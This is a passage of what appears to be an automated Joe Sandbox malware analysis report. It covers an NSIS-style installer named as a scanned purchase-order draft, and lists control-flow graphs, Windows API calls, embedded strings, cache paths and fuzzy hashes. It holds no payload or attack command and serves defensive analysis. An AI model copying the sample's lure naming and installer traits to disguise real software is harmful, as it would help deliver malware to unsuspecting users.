                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                • String ID:
                                                                                • API String ID: 3282139019-0
                                                                                • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                                • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 244 403987-40399f call 406671 247 4039a1-4039b1 call 4061de 244->247 248 4039b3-4039ea call 406165 244->248 257 403a0d-403a36 call 403c5d call 405c74 247->257 253 403a02-403a08 lstrcatW 248->253 254 4039ec-4039fd call 406165 248->254 253->257 254->253 262 403ac8-403ad0 call 405c74 257->262 263 403a3c-403a41 257->263 269 403ad2-403ad9 call 4062b9 262->269 270 403ade-403b03 LoadImageW 262->270 263->262 265 403a47-403a6f call 406165 263->265 265->262 271 403a71-403a75 265->271 269->270 273 403b84-403b8c call 40140b 270->273 274 403b05-403b35 RegisterClassW 270->274 275 403a87-403a93 lstrlenW 271->275 276 403a77-403a84 call 405b99 271->276 287 403b96-403ba1 call 403c5d 273->287 288 403b8e-403b91 273->288 277 403c53 274->277 278 403b3b-403b7f SystemParametersInfoW CreateWindowExW 274->278 282 403a95-403aa3 lstrcmpiW 275->282 283 403abb-403ac3 call 405b6c call 406297 275->283 276->275 281 403c55-403c5c 277->281 278->273 282->283 286 403aa5-403aaf GetFileAttributesW 282->286 283->262 290 403ab1-403ab3 286->290 291 403ab5-403ab6 call 405bb8 286->291 297 403ba7-403bc1 ShowWindow call 406601 287->297 298 403c2a-403c32 call 4053d2 287->298 288->281 290->283 290->291 291->283 303 403bc3-403bc8 call 406601 297->303 304 403bcd-403bdf GetClassInfoW 297->304 305 403c34-403c3a 298->305 306 403c4c-403c4e call 40140b 298->306 303->304 309 403be1-403bf1 GetClassInfoW RegisterClassW 304->309 310 403bf7-403c1a DialogBoxParamW call 40140b 304->310 305->288 311 403c40-403c47 call 40140b 305->311 306->277 309->310 315 403c1f-403c28 call 4038d7 310->315 311->288 315->281
                                                                                APIs
                                                                                  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00000000), ref: 00403A08
                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\retsplejelovenes\Bioassayed,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\retsplejelovenes\Bioassayed,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403AA6
                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\retsplejelovenes\Bioassayed), ref: 00403AEF
                                                                                  • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                                • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                                • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                                • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\retsplejelovenes\Bioassayed$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                • API String ID: 1975747703-1307758719
                                                                                • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                                • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 318 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 321 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 318->321 322 402f2d-402f32 318->322 330 403052-403060 call 402e79 321->330 331 402f6b 321->331 323 40310f-403113 322->323 338 403062-403065 330->338 339 4030b5-4030ba 330->339 333 402f70-402f87 331->333 335 402f89 333->335 336 402f8b-402f94 call 40330e 333->336 335->336 343 402f9a-402fa1 336->343 344 4030bc-4030c4 call 402e79 336->344 341 403067-40307f call 403324 call 40330e 338->341 342 403089-4030b3 GlobalAlloc call 403324 call 403116 338->342 339->323 341->339 365 403081-403087 341->365 342->339 369 4030c6-4030d7 342->369 347 402fa3-402fb7 call 405d48 343->347 348 40301d-403021 343->348 344->339 353 40302b-403031 347->353 367 402fb9-402fc0 347->367 352 403023-40302a call 402e79 348->352 348->353 352->353 360 403040-40304a 353->360 361 403033-40303d call 406764 353->361 360->333 368 403050 360->368 361->360 365->339 365->342 367->353 371 402fc2-402fc9 367->371 368->330 372 4030d9 369->372 373 4030df-4030e4 369->373 371->353 374 402fcb-402fd2 371->374 372->373 375 4030e5-4030eb 373->375 374->353 377 402fd4-402fdb 374->377 375->375 376 4030ed-403108 SetFilePointer call 405d48 375->376 380 40310d 376->380 377->353 379 402fdd-402ffd 377->379 379->339 381 403003-403007 379->381 380->323 382 403009-40300d 381->382 383 40300f-403017 381->383 382->368 382->383 383->353 384 403019-40301b 383->384 384->353
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                  • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                  • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                • String ID: "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\scan_241205-801_draft_PO.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                • API String ID: 4283519449-3085402997
                                                                                • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                                • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 385 4062b9-4062c4 386 4062c6-4062d5 385->386 387 4062d7-4062ed 385->387 386->387 388 4062f3-406300 387->388 389 406505-40650b 387->389 388->389 392 406306-40630d 388->392 390 406511-40651c 389->390 391 406312-40631f 389->391 393 406527-406528 390->393 394 40651e-406522 call 406297 390->394 391->390 395 406325-406331 391->395 392->389 394->393 397 4064f2 395->397 398 406337-406375 395->398 401 406500-406503 397->401 402 4064f4-4064fe 397->402 399 406495-406499 398->399 400 40637b-406386 398->400 403 40649b-4064a1 399->403 404 4064cc-4064d0 399->404 405 406388-40638d 400->405 406 40639f 400->406 401->389 402->389 408 4064b1-4064bd call 406297 403->408 409 4064a3-4064af call 4061de 403->409 411 4064d2-4064da call 4062b9 404->411 412 4064df-4064f0 lstrlenW 404->412 405->406 407 40638f-406392 405->407 410 4063a6-4063ad 406->410 407->406 413 406394-406397 407->413 423 4064c2-4064c8 408->423 409->423 415 4063b2-4063b4 410->415 416 4063af-4063b1 410->416 411->412 412->389 413->406 419 406399-40639d 413->419 421 4063b6-4063dd call 406165 415->421 422 4063ef-4063f2 415->422 416->415 419->410 434 4063e3-4063ea call 4062b9 421->434 435 40647d-406480 421->435 426 406402-406405 422->426 427 4063f4-406400 GetSystemDirectoryW 422->427 423->412 425 4064ca 423->425 431 40648d-406493 call 40652b 425->431 428 406470-406472 426->428 429 406407-406415 GetWindowsDirectoryW 426->429 432 406474-406478 427->432 428->432 433 406417-406421 428->433 429->428 431->412 432->431 436 40647a 432->436 439 406423-406426 433->439 440 40643b-406451 SHGetSpecialFolderLocation 433->440 434->432 435->431 442 406482-406488 lstrcatW 435->442 436->435 439->440 443 406428-40642f 439->443 444 406453-40646a SHGetPathFromIDListW CoTaskMemFree 440->444 445 40646c 440->445 442->431 447 406437-406439 443->447 444->432 444->445 445->428 447->432 447->440
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063FA
                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 0040640D
                                                                                • SHGetSpecialFolderLocation.SHELL32(00405336,007924D8,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 00406449
                                                                                • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 00406457
                                                                                • CoTaskMemFree.OLE32(007924D8), ref: 00406462
                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                                • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 004064E0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 717251189-1230650788
                                                                                • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                                • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 448 4052ff-405314 449 40531a-40532b 448->449 450 4053cb-4053cf 448->450 451 405336-405342 lstrlenW 449->451 452 40532d-405331 call 4062b9 449->452 453 405344-405354 lstrlenW 451->453 454 40535f-405363 451->454 452->451 453->450 456 405356-40535a lstrcatW 453->456 457 405372-405376 454->457 458 405365-40536c SetWindowTextW 454->458 456->454 459 405378-4053ba SendMessageW * 3 457->459 460 4053bc-4053be 457->460 458->457 459->460 460->450 461 4053c0-4053c3 460->461 461->450
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                • lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                • lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,759223A0), ref: 0040535A
                                                                                • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2531174081-0
                                                                                • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                                • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 462 406601-406621 GetSystemDirectoryW 463 406623 462->463 464 406625-406627 462->464 463->464 465 406638-40663a 464->465 466 406629-406632 464->466 468 40663b-40666e wsprintfW LoadLibraryExW 465->468 466->465 467 406634-406636 466->467 467->468
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                • wsprintfW.USER32 ref: 00406653
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-1946221925
                                                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 469 403116-40312d 470 403136-40313f 469->470 471 40312f 469->471 472 403141 470->472 473 403148-40314d 470->473 471->470 472->473 474 40315d-40316a call 40330e 473->474 475 40314f-403158 call 403324 473->475 479 403170-403174 474->479 480 4032fc 474->480 475->474 481 4032a7-4032a9 479->481 482 40317a-4031a0 GetTickCount 479->482 483 4032fe-4032ff 480->483 484 4032e9-4032ec 481->484 485 4032ab-4032ae 481->485 486 403304 482->486 487 4031a6-4031ae 482->487 488 403307-40330b 483->488 489 4032f1-4032fa call 40330e 484->489 490 4032ee 484->490 485->486 491 4032b0 485->491 486->488 492 4031b0 487->492 493 4031b3-4031c1 call 40330e 487->493 489->480 501 403301 489->501 490->489 495 4032b3-4032b9 491->495 492->493 493->480 503 4031c7-4031d0 493->503 498 4032bb 495->498 499 4032bd-4032cb call 40330e 495->499 498->499 499->480 506 4032cd-4032d9 call 405e3f 499->506 501->486 505 4031d6-4031f6 call 4067d2 503->505 510 4031fc-40320f GetTickCount 505->510 511 40329f-4032a1 505->511 515 4032a3-4032a5 506->515 516 4032db-4032e5 506->516 513 403211-403219 510->513 514 40325a-40325c 510->514 511->483 518 403221-403252 MulDiv wsprintfW call 4052ff 513->518 519 40321b-40321f 513->519 520 403293-403297 514->520 521 40325e-403262 514->521 515->483 516->495 517 4032e7 516->517 517->486 526 403257 518->526 519->514 519->518 520->487 522 40329d 520->522 524 403264-40326b call 405e3f 521->524 525 403279-403284 521->525 522->486 529 403270-403272 524->529 528 403287-40328b 525->528 526->514 528->505 530 403291 528->530 529->515 531 403274-403277 529->531 530->486 531->528
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
